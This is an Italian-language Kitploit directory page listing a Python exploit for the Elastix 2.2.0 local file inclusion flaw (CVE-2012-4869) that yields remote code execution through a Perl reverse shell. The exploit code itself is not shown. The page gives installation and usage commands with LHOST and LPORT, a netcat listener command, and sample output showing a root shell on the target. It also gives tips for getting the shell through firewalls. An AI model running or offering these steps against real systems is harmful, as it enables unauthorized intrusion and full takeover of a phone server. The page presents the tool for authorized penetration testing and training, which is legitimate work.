Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Elastix-2.2.0-CVE-2012-4869 — Script di exploit in Python per la vulnerabilità LFI di Elastix 2.2.0 (CVE-2012-4869) che consente l'esecuzione remota di codice tramite l'iniezione di un payload di reverse shell in Perl. | Kitploit
Strumenti/GitHubGitHub/cyberdesu/elastix-2.2.0-cve-2012-4869
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubcyberdesu/elastix-2.2.0-cve-2012-4869

Elastix-2.2.0-CVE-2012-4869

Script di exploit in Python per la vulnerabilità LFI di Elastix 2.2.0 (CVE-2012-4869) che consente l'esecuzione remota di codice tramite l'iniezione di un payload di reverse shell in Perl.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Elastix 2.2.0 Exploit di inclusione locale di file - CVE-2012-4869

Descrizione

Questo script sfrutta una vulnerabilità di inclusione locale di file (LFI) in Elastix 2.2.0, consentendo l'esecuzione remota di codice (RCE) tramite l'iniezione di comandi attraverso l'endpoint callme_page.php. L'exploit si basa su CVE-2012-4869.

Caratteristiche

  • Ignora la verifica dei certificati TLS.
  • Utilizza un payload reverse shell Perl.
  • Supporta LHOST e LPORT personalizzati per la reverse shell.
  • Sopprime gli avvisi di sicurezza HTTPS.

Requisiti

  • Python 3
  • Modulo requests

Installa le dipendenze usando:

root@kitploit:~
pip install requests

Utilizzo

root@kitploit:~
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>

Esempio:

root@kitploit:~
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001

Configurare il Listener della Reverse Shell

Prima di eseguire l'exploit, avvia un listener Netcat sulla tua macchina:

root@kitploit:~
nc -lvnp 9001

Output dell'Esecuzione dell'Exploit

root@kitploit:~
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001

[+] Exploit sent successfully, waiting for reverse shell...

[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)

Note

  • Se la reverse shell non si connette, assicurati che le regole del firewall e le impostazioni di SELinux consentano connessioni in uscita.
  • È possibile utilizzare payload alternativi (ad esempio Bash o Python) se Perl non è disponibile.
  • Assicurati che il tuo LHOST sia raggiungibile dalla macchina target.

Disclaimer

Questo exploit ha esclusivamente scopi educativi e di test di sicurezza autorizzati. L'uso non autorizzato è illegale. L'autore non è responsabile dell'uso improprio di questo strumento.

Scarica lo strumento